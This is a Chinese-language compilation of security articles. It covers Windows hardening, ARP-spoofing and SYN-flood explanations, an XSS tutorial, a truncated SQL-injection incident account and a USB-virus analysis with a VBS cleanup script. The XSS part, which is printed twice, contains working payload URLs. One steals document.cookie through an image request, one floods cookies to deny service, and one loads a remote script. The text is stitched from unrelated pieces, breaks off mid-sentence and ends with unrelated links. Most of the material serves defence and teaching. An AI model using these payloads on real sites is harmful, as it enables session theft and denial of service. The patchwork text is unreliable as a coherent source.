如果你使用了Windows /XP系统,右键单击C盘或者其他盘,选择“共享”,你会惊奇地发现它已经被设置为“共享该文件夹”,而在“网上邻居”中却看不到这些内容,这是怎么回事呢?
原来,在默认状态下,Windows 2000/XP会开启所有分区的隐藏共享,从“控制面板/管理工具/计算机管理”窗口下选择“系统工具/共享文件夹/共享”,就可以看到硬盘上的每个分区名后面都加了一个“$”。但是只要键入“计算机名或者IPC$”,系统就会询问用户名和密码,遗憾的是,大多数个人用户系统Administrator的密码都为空,入侵者可以轻易看到C盘的内容,这就给网络安全带来了极大的隐患。
怎么来消除默认共享呢?方法很简单,打开注册表编辑器,进入“HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Sevices/Lanman/work station/parameters”,新建一个名为“AutoShareWKs”的双字节值,并将其值设为“0”,然后重新启动电脑,这样共享就取消了。
二、拒绝恶意代码
恶意网页成了宽带的最大威胁之一。以前使用Modem,因为打开网页的速度慢,在完全打开前关闭恶意网页还有避免中招的可能性。现在宽带的速度这么快,所以很容易就被恶意网页攻击。
一般恶意网页都是因为加入了用编写的恶意代码才有破坏力的。这些恶意代码就相当于一些小程序,只要打开该网页就会被运行。所以要避免恶意网页的攻击只要禁止这些恶意代码的运行就可以了。
运行IE浏览器,点击“工具/Internet选项/安全/自定义级别”,将安全级别定义为“安全级-高”,对“ActiveX控件和插件”中第2、3项设置为“禁用”,其它项设置为“提示”,之后点击“确定”。这样设置后,当你使用IE浏览网页时,就能有效避免恶意网页中恶意代码的攻击。
三、封死 的“后门”
俗话说“无风不起浪”,既然 能进入,那说明系统一定存在为他们打开的“后门”,只要堵死这个后门,让 无处下手,便无后顾之忧!
1.删掉不必要的协议
对于服务器和主机来说,一般只安装TCP/IP协议就够了,
鼠标右击“网络邻居”,选择“属性”,再鼠标右击“本地连接”,选择“属性”,卸载不必要的协议。其中NETBIOS是很多安全缺陷的根源,对于不需要提供文件和打印共享的主机,还可以将绑定在TCP/IP协议的NETBIOS关闭,避免针对NETBIOS的攻击。选择“TCP/IP协议/属性/高级”,进入“高级TCP/IP设置”对话框,选择“WINS”标签,勾选“禁用TCP/IP上的NETBIOS”一项,关闭NETBIOS。
2.关闭“文件和打印共享”
文件和打印共享应该是一个非常有用的功能,但在不需要它的时候,也是 入侵的很好的安全漏洞。所以在没有必要“文件和打印共享”的情况下,我们可以将它关闭。用鼠标右击“网络邻居”,选择“属性”,然后单击“文件和打印共享”按钮,将弹出的“文件和打印共享”对话框中的两个复选框中的钩去掉即可。
虽然“文件和打印共享”关闭了,但是还不能确保安全,还要修改注册表,禁止它人更改“文件和打印共享”。打开注册表编辑器,选择“HKEY_CURRENT_USER/Software/MicrosoftWindows/CurrentVersion/Policies/
NetWork”主键,在该主键下新建DWORD类型的键值,键值名为“NoFileSharingControl”,键值设为“1”表示禁止这项功能,从而达到禁止更改“文件和打印共享”的目的;键值为“0”表示允许这项功能。这样在“网络邻居”的“属性”对话框中“文件和打印共享”就不复存在了。
3.把Guest账号禁用
有很多入侵都是通过这个账号进一步获得管理员密码或者权限的。如果不想把自己的计算机给别人当玩具,那还是禁止的好。打开控制面板,双击“用户和密码”,单击“高级”选项卡,再单击“高级”按钮,弹出本地用户和组窗口。在Guest账号上面点击右键,选择属性,在“常规”页中选中“账户已停用”。另外,将Administrator账号改名可以防止 知道自己的管理员账号,这会在很大程度上保证计算机安全。
4.禁止建立空连接
在默认的情况下,任何用户都可以通过空连接连上服务器,枚举账号并猜测密码。因此,我们必须禁止建立空连接。方法有以下两种:
方法一是修改注册表:打开注册表“HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/LSA”,将DWORD值“RestrictAnonymous”的键值改为“1”即可。
最后建议大家给自己的系统打上补丁,微软那些没完没了的补丁还是很有用的!
上网的时候,经常会发现自己的网络防火墙在不停的发出警报,专家告诉你这就有可能是遭遇了 的攻击,那有什么办法来摆脱这些不请自来的 呢?
隐藏IP地址
经常利用一些网络探测技术来查看我们的主机信息,主要目的就是得到网络中主机的IP地址。IP地址在网络安全上是一个很重要的概念,如果攻击者知道了你的IP地址,等于为他的攻击准备好了目标,他可以向这个IP发动各种进攻,如DoS(拒绝服务)攻击、Floop溢出攻击等。隐藏IP地址的主要方法是使用代理服务器。
与直接连接到Internet相比,使用代理服务器能保护上网用户的IP地址,从而保障上网安全。代理服务器的原理是在客户机(用户上网的计算机)和远程服务器(如用户想访问远端WWW服务器)之间架设一个“中转站”,当客户机向远程服务器提出服务要求后,代理服务器首先截取用户的请求,然后代理服务器将服务请求转交远程服务器,从而实现客户机和远程服务器之间的联系。很显然,使用代理服务器后,其它用户只能探测到代理服务器的IP地址而不是用户的IP地址,这就实现了隐藏用户IP地址的目的,保障了用户上网安全,
提供免费代理服务器的网站有很多,你也可以自己用代理猎手等工具来查找。
关闭不必要的端口
在入侵时常常会扫描你的计算机端口,如果安装了端口监视程序 (比如Netwatch),该监视程序则会有警告提示。如果遇到这种入侵,可用工具软件关闭用不到的端口,比如,用“Norton Internet Security”关闭用来提供网页服务的80和443端口,其他一些不常用的端口也可关闭。
更换管理员帐户
Administrator帐户拥有最高的系统权限,一旦该帐户被人利用,后果不堪设想。 入侵的常用手段之一就是试图获得Administrator帐户的密码,所以我们要重新配置Administrator账号。
首先是为Administrator帐户设置一个强大复杂的密码,然后我们重命名Administrator帐户,再创建一个没有管理员权限的 Administrator帐户欺骗入侵者。这样一来,入侵者就很难搞清哪个帐户真正拥有管理员权限,也就在一定程度上减少了危险性。
Part1. 病毒现象
中毒机器在局域网中发送假的APR应答包进行APR欺骗, 造成其他客户机无法获得网关和其他客户机的网卡真实MAC地址,导致无法上网和正常的局域网通信.
Part2. 病毒原理分析:
病毒的组件
本文研究的病毒样本有三个组件构成:
%windows%\SYSTEM32\LOADHW.EXE(108,386 bytes) ….. ”病毒组件释放者”
%windows%\System32\drivers\npf.sys(119,808 bytes) ….. ”发ARP欺骗包的驱动程序”
%windows%\System32\msitinit.dll (39,952 bytes)…”命令驱动程序发ARP欺骗包的控制者”
病毒运作基理:
1.LOADHW.EXE 执行时会释放两个组件npf.sys 和msitinit.dll .
LOADHW.EXE释放组件后即终止运行.
注意: 病毒假冒成winPcap的驱动程序,并提供winPcap的功能. 客户若原先装有winPcap,
npf.sys将会被病毒文件覆盖掉.
二、ARP病毒分析
当局域网内某台主机运行ARP欺骗的木马程序时,会欺骗局域网内所有主机和路由器,让所有上网的流量必须经过病毒主机,其他用户原来直接通过路由器上网现在转由通过病毒主机上网,切换的时候用户会断一次线。切换到病毒主机上网后,如果用户已经登陆了传奇服务器,那么病毒主机就会经常伪造断线的假像,那么用户就得重新登录传奇服务器,这样病毒主机就可以 了。
由于ARP欺骗的木马程序发作的时候会发出大量的数据包导致局域网通讯拥塞以及其自身处理能力的限制,用户会感觉上网速度越来越慢。当ARP欺骗的木马程序停止运行时,用户会恢复从路由器上网,切换过程中用户会再断一次线。
在路由器的“系统历史记录”中看到大量如下的信息:
MAC Chged 10.128.103.124MAC Old 00:01:6c:36:d1:7fMAC New 00:05:5d:60:c7:18
这个消息代表了用户的MAC地址发生了变化,在ARP欺骗木马开始运行的时候,局域网所有主机的MAC地址更新为病毒主机的MAC地址(即所有信息的MAC New地址都一致为病毒主机的MAC地址),同时在路由器的“用户统计”中看到所有用户的MAC地址信息都一样,
如果是在路由器的“系统历史记录”中看到大量MAC Old地址都一致,则说明局域网内曾经出现过ARP欺骗(ARP欺骗的木马程序停止运行时,主机在路由器上恢复其真实的MAC地址)。
BKDR_NPFECT.A病毒引起ARP欺骗之实测分析
据统计,在所有 攻击事件中,SYN攻击是最常见又最容易被利用的一种攻击手法,相信很多人还记得YAHOO网站遭受的攻击事例,当时 利用的就是简单而有效的SYN攻击,有些网络蠕虫病毒配合SYN攻击造成更大的破坏。本文介绍SYN攻击的基本原理、工具及检测方法,并全面探讨SYN攻击防范技术。
一、TCP握手协议
在TCP/IP协议中,TCP协议提供可靠的连接服务,采用三次握手建立一个连接。
第一次握手:建立连接时,客户端发送syn包(syn=j)到服务器,并进入SYN_SEND状态,等待服务器确认;
第二次握手:服务器收到syn包,必须确认客户的SYN(ack=j+1),同时自己也发送一个SYN包(syn=k),即SYN+ACK包,此时服务器进入SYN_RECV状态;
第三次握手:客户端收到服务器的SYN+ACK包,向服务器发送确认包ACK(ack=k+1),此包发送完毕,客户端和服务器进入ESTABLISHED状态,完成三次握手。
完成三次握手,客户端与服务器开始传送数据,在上述过程中,还有一些重要的概念:
未连接队列:在三次握手协议中,服务器维护一个未连接队列,该队列为每个客户端的SYN包(syn=j)开设一个条目,该条目表明服务器已收到SYN包,并向客户发出确认,正在等待客户的确认包。这些条目所标识的连接在服务器处于Syn_RECV状态,当服务器收到客户的确认包时,删除该条目,服务器进入ESTABLISHED状态,
Backlog参数:表示未连接队列的最大容纳数目。
SYN-ACK 重传次数 服务器发送完SYN-ACK包,如果未收到客户确认包,服务器进行首次重传,等待一段时间仍未收到客户确认包,进行第二次重传,如果重传次数超过系统规定的最大重传次数,系统将该连接信息从半连接队列中删除。注意,每次重传等待的时间不一定相同。
半连接存活时间:是指半连接队列的条目存活的最长时间,也即服务从收到SYN包到确认这个报文无效的最长时间,该时间值是所有重传请求包的最长等待时间总和。有时我们也称半连接存活时间为Timeout时间、SYN_RECV存活时间。
二、SYN攻击原理
SYN攻击属于DOS攻击的一种,它利用TCP协议缺陷,通过发送大量的半连接请求,耗费CPU和内存资源。SYN攻击除了能影响主机外,还可以危害路由器、防火墙等网络系统,事实上SYN攻击并不管目标是什么系统,只要这些系统打开TCP服务就可以实施。从上图可看到,服务器接收到连接请求(syn=j),将此信息加入未连接队列,并发送请求包给客户(syn=k,ack=j+1),此时进入SYN_RECV状态。当服务器未收到客户端的确认包时,重发请求包,一直到超时,才将此条目从未连接队列删除。配合IP欺骗,SYN攻击能达到很好的效果,通常,客户端在短时间内伪造大量不存在的IP地址,向服务器不断地发送syn包,服务器回复确认包,并等待客户的确认,由于源地址是不存在的,服务器需要不断的重发直至超时,这些伪造的SYN包将长时间占用未连接队列,正常的SYN请求被丢弃,目标系统运行缓慢,严重者引起网络堵塞甚至系统瘫痪。
0,关键字:XSS,跨站脚本攻击,原理分析,攻击方式,防范,检查,恶意代码,蠕虫
1。概念
以下概念摘抄自百度百科:
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。
2。生效方式
1)构造URL
XSS攻击者通过构造URL的方式构造了一个有问题的页面;当其他人点击了此页面后,会发现页面出错,或者被暗中执行了某些js脚本,这时,攻击行为才真正生效。
一般来说,动态页面中会将url中的部分内容回写在页面中。以百度的搜索为例:
www.baidu.com/s?wd=转义后的结果,搜索结果页中,会在标题中中和搜索框中回写用户输入的内容。从页面的源代码中,我们看到,这两处本应该显示用户输入内容的地方,实际也经过了转义处理,变成了。如果这里没有经过转义处理,则页面中就嵌入了一段script,会执行,并弹出对话框提示用户。如果是其他恶意代码,则可能造成破坏。
然后攻击者将此URL广为传播——比如说,以报错的方式发给百度的管理员,管理员打开这个URL就中招了。
2)发布内容式
构造URL攻击方式传播范围有限,被攻击者只要有基本的安全意识就可以避免,因此这种手段的危险性比较小。相比之下,通过发表内容构造的XSS的危害就大了很多。
在可以发表内容的论坛、讨论区、吧、博客、微博等网站上,用户发表的内容会保存起来,允许其他用户浏览。这些保存的内容显示在页面上的时候,如果没有经过正确的处理,也会把攻击者精心构造的内容显示出来,访问该内容的用户就此中招。如果该页面流传广泛,则影响会更加深远。
一般来说,这种攻击都做得比较隐蔽,被攻击者并不知道自己什么时候踩中了地雷;网站也很难追查问题的来源。
3)蠕虫式
上述两种方式的流传范围都有一定限度;最彻底最暴力的方式是使用蠕虫——就是首先发一个有问题的文章,浏览者阅读时会被暗中执行恶意代码,发表一篇新的文章的,该文章也含有同样的恶意代码。这样有可能在最快时间内将攻击铺满整个网站。蠕虫式攻击将暗中偷偷摸摸的攻击行为变成了光明正大的攻城拔寨,极容易被发现和修复。
下面是6月28日 被蠕虫攻击的报告,其实质就是XSS攻击,
www.ijinshan.com/news/0629001.shtml
3。破坏方式
1)破坏页面结构
用户输入的内容包含了html的标签,与前面的标签等闭合,导致页面的DIV结构发生变化,页面错乱。
测试
测试用户输入的内容包含了单引号或双引号,与前面的单引号或双引号匹配,导致后面的内容丢失,显示不出来。
可以使用php内置方法htmlspecialchars来处理待输出的内容,将上述字符转义。
综合1)和2)两者需要处理的内容基本是一样的,而多转义并不会带来副作用,因此可以使用统一的处理方法
$out = htmlspecialchars($out,ENT_QUOTES)
注意第二个参数是明确要求将双引号进行转义。
3)JS
将要输出到js代码片断中的用户输入内容没有好的办法进行处理;仅转义少数字符不能保证去掉所有的攻击可能。
因此,一般建议不要把用户产生的内容直接输出到js片断中。
如果条件所限,必须将内容直接输出,有如下方法可供选择:
a) 如果待输出的内容有特定的取值返围或者特定的格式,可以使用白名单或者正则表达式进行处理。
b) 可以将内容输出到html的隐藏标签或隐藏表单中,js通过获取标签的内容得到该内容。
c) 使用json_encode将内容编码后输出到页面上,页面上使用eval将内容取出来。
5。检查
那么,对已有的页面,该如何检查呢?
这个问题的回答是,目前没有很好的办法能完全检查出可能存在xss攻击的页面;有一些办法可以检查出比较明显的疏漏,其基本思路如下:
1)从apache的access_log中取出所有unique的请求,依次修改其某一个参数为 “”,发起请求;
2)获取返回的内容,如果内容中有原样的该字符串,表明此可疑输入没有经过处理便输出到页面上,页面存在隐患,需要处理。
通过这种办法,可以检查出绝大多数能通过get请求发起的xss攻击。那些在access_log没有出现的请求参数,这里没有检查到,可能有所遗漏,就需要手动去整理,测试。
通过Post发起的请求需要用另外一种策略进行检查。其思路如下:
将网站上所有可以输入的表单,依次输入特征字符串,比如说<'“>,如果提交后产生的页面中含有未处理的此字符串,说明存在隐患。
随着教育信息化进程的推进,各类教育网站大量涌现,由于教育网站大多是学校计算机教师自己开发管理的小型网站,普通存在着设备、技术、专业人员不足的问题,网站自身存在漏洞,常常成为 攻击的目标,严重影响了正常业务的开展。这里,笔者希望通过对教育网站所遭遇的三次 入侵的剖析,来分析 常用的入侵方法和手段。
第一次遭遇入侵
1.入侵现象:春节,网站的公告栏上突然出现“此论坛有漏洞,请管理员修复”的内容,并被粘贴了一张图片,
2.处理问题的过程:首先想到的是以为存在某个windows漏洞,于是就先删除这条内容,然后对Windows2000服务器重新安装升级补丁,完成更严格的安全设置并更换了全套密码。自以为可以高枕无忧了,不料没过几天,公告板上再次出现 的警告“你的漏洞依然存在,我可以告诉你问题所在,但作为回报我要你网站的源代码”。
3.入侵原理:我当然不会轻易就范,经过查阅资料最后发现原来漏洞是SQL致命的“单引号注入”。入侵原理如下:在网站后台管理登录页面用户密码认证时,如果用户在“UserID”输入框内输入“Everybody”,在密码框里输入“anything
0,关键字:XSS,跨站脚本攻击,原理分析,攻击方式,防范,检查,恶意代码,蠕虫
1。概念
以下概念摘抄自百度百科:
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。
2。生效方式
1)构造URL
XSS攻击者通过构造URL的方式构造了一个有问题的页面;当其他人点击了此页面后,会发现页面出错,或者被暗中执行了某些js脚本,这时,攻击行为才真正生效。
一般来说,动态页面中会将url中的部分内容回写在页面中。以百度的搜索为例:
www.baidu.com/s?wd=转义后的结果,搜索结果页中,会在标题中中和搜索框中回写用户输入的内容。从页面的源代码中,我们看到,这两处本应该显示用户输入内容的地方,实际也经过了转义处理,变成了。如果这里没有经过转义处理,则页面中就嵌入了一段script,会执行,并弹出对话框提示用户。如果是其他恶意代码,则可能造成破坏。
然后攻击者将此URL广为传播——比如说,以报错的方式发给百度的管理员,管理员打开这个URL就中招了。
2)发布内容式
构造URL攻击方式传播范围有限,被攻击者只要有基本的安全意识就可以避免,因此这种手段的危险性比较小。相比之下,通过发表内容构造的XSS的危害就大了很多。
在可以发表内容的论坛、讨论区、吧、博客、微博等网站上,用户发表的内容会保存起来,允许其他用户浏览。这些保存的内容显示在页面上的时候,如果没有经过正确的处理,也会把攻击者精心构造的内容显示出来,访问该内容的用户就此中招。如果该页面流传广泛,则影响会更加深远。
一般来说,这种攻击都做得比较隐蔽,被攻击者并不知道自己什么时候踩中了地雷;网站也很难追查问题的来源。
3)蠕虫式
上述两种方式的流传范围都有一定限度;最彻底最暴力的方式是使用蠕虫——就是首先发一个有问题的文章,浏览者阅读时会被暗中执行恶意代码,发表一篇新的文章的,该文章也含有同样的恶意代码。这样有可能在最快时间内将攻击铺满整个网站。蠕虫式攻击将暗中偷偷摸摸的攻击行为变成了光明正大的攻城拔寨,极容易被发现和修复。
下面是6月28日 被蠕虫攻击的报告,其实质就是XSS攻击。
www.ijinshan.com/news/0629001.shtml3。破坏方式
1)破坏页面结构
用户输入的内容包含了html的标签,与前面的标签等闭合,导致页面的DIV结构发生变化,页面错乱。
测试测试
用户输入的内容包含了单引号或双引号,与前面的单引号或双引号匹配,导致后面的内容丢失,显示不出来。
一般来说,破坏页面结构导致页面故障的xss行为,一般是用户发表的内容无意中包含了特定的字符串,因此不具有直接的破坏作用,只会影响网站的声誉。
2)执行恶意代码
恶意代码有无限种,有代码执行的环境,就可以为所欲为。下面简单列几种:
a)增加cookie,导致cookie总长度超过4K,服务器直接拒绝响应:
b)获取用户cookie,仿冒顾客身份登陆
c)嵌入一个js文件,那可做的事情就多了去了
3)样例
xss_url.php文件的内容如下:
session_start;
$html = $_GET['html']?$_GET['html']:”html“;
$attr = $_GET['attr']?$_GET['attr']:”attr“;
$js = $_GET['js']?$_GET['js']:”js“;
?>
例子文件中有三个参数,分别是输出在js中的内容js,输出在html标签属性中的内容attr,输出在html标签内的内容html,
js中的内容难以过滤和转义,有很多种办法都可以嵌入一些可执行的js片断。因此是不安全的。
下面构造了几个URL,可以进行适度的攻击:
a) 不停弹出对话框,恶心人
A
182.18.24.130/test/xss_url.php?html=a%3Cscript+type%3D%22text%2Fjavascript%22%3Ewhile%28true%29{alert%28document.cookie%29}%3C%2Fscript%3EA
b) 在页面中写一个图片文件,图片的URL参数就是当前用户的cookie
A
182.18.24.130/test/xss_url.php?html=a%3Cscript+type%3D%22text%2Fjavascript%22%3Edocument.write%28%27%3Cimg+src%3D%22http%3A%2F%2F182.18.24.130%2Ftest%2Fc.gif%3Fa%3D%27%2Bdocument.cookie%2B%27%22%3E%3C%2Fimg%3E%27%29%3C%2Fscript%3EA
c)恶意写入大量cookie,超出服务器上限,导致服务器拒绝响应
182.18.24.130/test/xss_url.php?html=a%3Cscript+type%3D%22text%2Fjavascript%22%3Eb%3D%27a%27%3Bfor%28var+i%3D0%3Bi%3C1000%3Bi%2B%2B%29{b%2B%3Di}%3Bc%3D%28new+Date%28%29%29.getTime%28%29%3Bdocument.cookie%3D%27a%27%2Bc%2B%27%3Db1000%27%2Bb+%3C%2Fscript%3E
4)嵌入一个JS文件,则可以做得更多
182.18.24.130/test/xss_url.php?html=%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22http%3A%2F%2F182.18.24.130%2Ftest%2Fa.js%22%3E%3C%2Fscript%3E
4。防范
XSS攻击的模式很简单,就是把自己的代码嵌入到页面里,随页面一块执行;XSS攻击的防范也一样简单,就是对输出到页面上的内容中特定字符进行转义,使代码不能执行即可。针对出现在不同位置的用户输入内容,其处理策略有所不同。
1)html
只需要处理掉< >即可,只要没有html标签,页面就是安全的。
可以使用php内置方法htmlspecialchars来处理待输出的内容,将<,>,& 转义
2)属性
只需要处理掉< >' ” 即可
可以使用php内置方法htmlspecialchars来处理待输出的内容,将上述字符转义。
综合1)和2)两者需要处理的内容基本是一样的,而多转义并不会带来副作用,因此可以使用统一的处理方法$out = htmlspecialchars($out,ENT_QUOTES)
注意第二个参数是明确要求将双引号进行转义。
3)JS
将要输出到js代码片断中的用户输入内容没有好的办法进行处理;仅转义少数字符不能保证去掉所有的攻击可能。
因此,一般建议不要把用户产生的内容直接输出到js片断中。
如果条件所限,必须将内容直接输出,有如下方法可供选择:
a) 如果待输出的内容有特定的取值返围或者特定的格式,可以使用白名单或者正则表达式进行处理。
b) 可以将内容输出到html的隐藏标签或隐藏表单中,js通过获取标签的内容得到该内容。
c) 使用json_encode将内容编码后输出到页面上,页面上使用eval将内容取出来。
5。检查
那么,对已有的页面,该如何检查呢?
这个问题的回答是,目前没有很好的办法能完全检查出可能存在xss攻击的页面;有一些办法可以检查出比较明显的疏漏,其基本思路如下:
1)从apache的access_log中取出所有unique的请求,依次修改其某一个参数为 “”,发起请求;
2)获取返回的内容,如果内容中有原样的该字符串,表明此可疑输入没有经过处理便输出到页面上,页面存在隐患,需要处理。
通过这种办法,可以检查出绝大多数能通过get请求发起的xss攻击。那些在access_log没有出现的请求参数,这里没有检查到,可能有所遗漏,就需要手动去整理,测试。
通过Post发起的请求需要用另外一种策略进行检查。其思路如下:
将网站上所有可以输入的表单,依次输入特征字符串,比如说<'“>,如果提交后产生的页面中含有未处理的此字符串,说明存在隐患。
大家好!我接触病毒的时间已经比较久了,也曾经痴迷过一段时间,
长期游荡在绅博/剑盟/中天/龙族,抓样本分析,测试等等。
装过的杀软也接近百款了,现在虽然没有以前那么痴迷了,不过还是比较关注。
最近在铁军的博客上看到金山论坛有这样一个活动,也想小试一下牛刀,班门弄斧一下。
其实我的分析里面主要还是讲方法,希望大家也能掌握基本的病毒分析方法,
期望能和大家共同进步!谢谢!
今天的主角是tel.xls.exe这个优盘病毒。这个病毒出现地比较早,之所以说它,
是因为它是一个比较典型的优盘病毒,而且变种比较难以消灭。
优盘病毒一般都以autorun.inf引导一个exe的实体病毒文件。
当然也有后期的以vb脚本引导的,那就更难处理了,而且往往打不开优盘,
可以用Win+R, 然后直接输入盘符名打开优盘。
tel.xls.exe作为一个优盘病毒,也不例外。
tel.xls.exe被感染后,会释放文件进入system32目录,同时会把自己复制到
每一个盘符中,监听本地端口,窃取主机信息并发送,其行为类似木马。
下面我来一步一步详细讲解:
1.首先当然是构建测试环境,真机测试比较危险,不推荐。
我用的是虚拟机,虚拟机优点是使用方便,而且不会影响实机。
就是先期配置烦一点,而且对机器配置要求比较高。
如果是配置差或者懒得去弄虚拟机,可以装个影子系统。
Windows下的虚拟机又分VMWare和Virtual PC两种,实现虚拟的原理不同,目的是一样的。
Virtual PC已经被微软收购,从07版开始只能在windows里虚拟windows,呵呵,垄断啊,
不过有个好处,VPC2007是免费的。
VMWare则可以在Windows下虚拟几乎所有操作系统,windows/dos/linux/freebsd等等。
不过是收费软件。
虚拟机装好之后,只要再安装一下软件自带的插件,就能与真机交换文件了。
非常好用。另外,虚拟机一般用桥接网络上网,非常好用。
我下面就以免费的VPC 2007来演示啦~
2.其次是抓样本,当然你优盘里面有现成的样本就更好了
有些论坛的样本区就有样本,上去下一个。
3. (这个病毒破坏力太强,之前的英文版系统的svchost.exe被破坏,无法开机,
不高兴修复了,直接改用新装的中文WinXP,所以这边会出现两个系统的截图)
下载后解压,发现看不到文件,
其实是因为病毒的文件属性是隐藏的系统文件。
必须进文件夹选项修改一下,把划红线的地方修改一下,
顺便把后缀也显示出来~
文件就可见了~
1.jpg(45.13 KB)
2008-10-22 15:05
4.接下来,可以把文件传到多引擎扫描网站上看看,
比如VirScan.org, 类似的网站还有Virus Total, Jotti's Malware Scan等。
一来可以“验明正身”,看看这个到底是不是病毒。
而来可以看看各个厂商的结果,如果没有报的话,还可以向厂商上报~
这边以“国产”的Virscan为例:
2.jpg(82.62 KB)
2008-10-22 15:05
毕竟是老病毒了,除了国外的冷门杀软,基本都报了。
这无所谓,我们主要看的是病毒分析方法和过程,呵呵。
5.为了分析病毒行为,可以放入沙盒(Sandbox) 测试。
网上就有一个不错的现成的沙盒(Norman Sandbox),可以对文件行为做分析。
只要上传文件,输入邮件地址,就能在邮箱收到报告。
3.jpg(41.66 KB)
2008-10-22 15:05
当然,这个沙盒的特点是现成的,操作简单速度快,不过结果也比较简单。
真正要观察病毒的实际行为,可以在虚拟机里面用RegMon, FileMon,autorun, TCP/IP等来看。
这些软件都是Sysinternal的,去年被微软收购了~ 当然,也可以用单机版的Sandbox来看,就是这个软件比较贵。
6. 不一会,就收到了分析的邮件:
4.jpg(36.93 KB)
2008-10-22 15:05
释放的文件,进程、注册表修改、MD5等参数全部一次性拿到,方便啊~
其实,对于一般用户来说,用一些好用的工具,例如金山清理专家或SREng同样能发现端倪:
使用清理专家扫描,发现可疑启动项:
5.jpg(46.13 KB)
2008-10-22 15:05
全面扫描,发现更多可疑项:
6.jpg(48.27 KB)
2008-10-22 15:05
扫描恶意软件,发现autorun.inf
7.jpg(45.97 KB)
2008-10-22 15:05
再使用SREng扫描:
8.jpg(43.06 KB)
2008-10-22 15:05
附上SReng扫描报告,
报告中的下列项目就是病毒生成的:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
进程
[PID: 3864 / SYSTEM][C:\WINDOWS\system32\mmc.exe] [N/A, ]
服务
[Smart Card Supervisor / mmc][Running/Manual Start]
<2 - 系统找不到指定的文件。
><(File is missing)>
Autorun.inf
[C:\]
[AutoRun]
pen=tel.xls.exe
shellexecute=tel.xls.exe
shell\Auto\command=tel.xls.exe
shell=Auto7.和沙盒的分析结果比对,多出一个叫 kill 的任务。如下图:
9.jpg(32.13 KB)
2008-10-22 15:10
多出一个mmc.exe进程,与沙盒分析结果吻合~
10.jpg(42.42 KB)
2008-10-22 15:10
8. 使用类似IceSword的工具结束进程,
IceSword是中科大的pjf写的,由于使用了Windows核心的API,可以直接看到隐藏文件和进程,
个人认为IceSword在处理两个进程互为保护的病毒时特别有效。可以同时结束两个进程。
或锁住一个进程,不让其再生。这招对付进程互为保护的病毒非常不错。
11.jpg(54.37 KB)
2008-10-22 15:10
9. 进程对应的文件,与沙盒分析吻合,删除之~
12.jpg(53.16 KB)
2008-10-22 15:10
生成的另两个文件,删除之~
13.jpg(53.81 KB)
2008-10-22 15:10
10.Win+R, msconfig, 删除增加的启动项。
14.jpg(38 KB)
2008-10-22 15:10
11. mmc在监听本地3000端口。一旦联网,就会对外发送信息。
15.jpg(24.56 KB)
2008-10-22 15:10
12. 最后,用金山毒霸全盘扫描一下,“打扫”一下战场吧~
因为生成的文件比较多,手工删的话也可以,先搜索文件再删除,
不过用毒霸又快又方便!
监控一开,立马开始删除~
16.jpg(41.24 KB)
2008-10-22 15:10
呵呵 已经感染exe了,扫描记录如下:
17.jpg(73.73 KB)
2008-10-22 15:10
svchost.exe受损,症状为再开机无法进入系统。进度条一直在走,
18.jpg(18.18 KB)
2008-10-22 15:10
插入光盘修复或进入Windows故障修复台,拷贝光盘原文件至硬盘修复即可~
19.jpg(42.1 KB)
2008-10-22 15:10
最后,附:VBS一次性清除代码:
on error resume next
set w=getobject(”winmgmts:“)
set p=w.execquery(”select * from win32_process where name='algsrv.exe' or name='SocksA.exe'“)
for each i in p
i.terminate
next
set fso=createobject(”scripting.filesystemobject“)
set del=wscript.createobject(”wscript.shell“)
dim d(5)
dim v(5)
d(0)=del.ExpandEnvironmentStrings(”%SystemRoot%\system32\SocksA.exe“)
d(1)=del.ExpandEnvironmentStrings(”%SystemRoot%\system32\FileKan.exe“)
d(2)=del.ExpandEnvironmentStrings(”%SystemRoot%\system32\algsrv.exe“)
d(3)=del.ExpandEnvironmentStrings(”%SystemRoot%\Session.exe“)
d(4)=del.ExpandEnvironmentStrings(”%SystemRoot%\BACKINF.TAB“)
for i=0 to 1
set v(i)=fso.getfile(d(i))
v(i).attributes=0
v(i).delete
next
set fso=createobject(”scripting.filesystemobject“)
set drvs=fso.drives
for each drv in drvs
if drv.drivetype=1 or drv.drivetype=2 or drv.drivetype=3 or drv.drivetype=4 then
set w=fso.getfile(drv.driveletter&”:\tel.xls.exe“)
w.attributes=0
w.delete
set u=fso.getfile(drv.driveletter&”:\AUTORUN.INF“)
u.attributes=0
u.delete
end if
next
set reg=wscript.createobject(”wscript.shell“)
reg.regwrite ”HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue“,1,”REG_DWORD“
reg.regwrite ”HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DefaultValue“,2,”REG_DWORD“
reg.regwrite ”HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue“,2,”REG_DWORD“
reg.regwrite ”HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\DefaultValue“,2,”REG_DWORD“
reg.regwrite ”HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\UncheckedValue“,1,”REG_DWORD“
reg.regwrite ”HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt\UncheckedValue“,0,”REG_DWORD“
reg.regdelete ”HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ASocksrv“
set fso=nothing
msgbox ”病毒清除成功,请重启电脑!“,64,”tel.xls.exe病毒专杀"
全文完~★ 自我分析小结
★ 财务分析方法报告
★ 财务比率分析方法
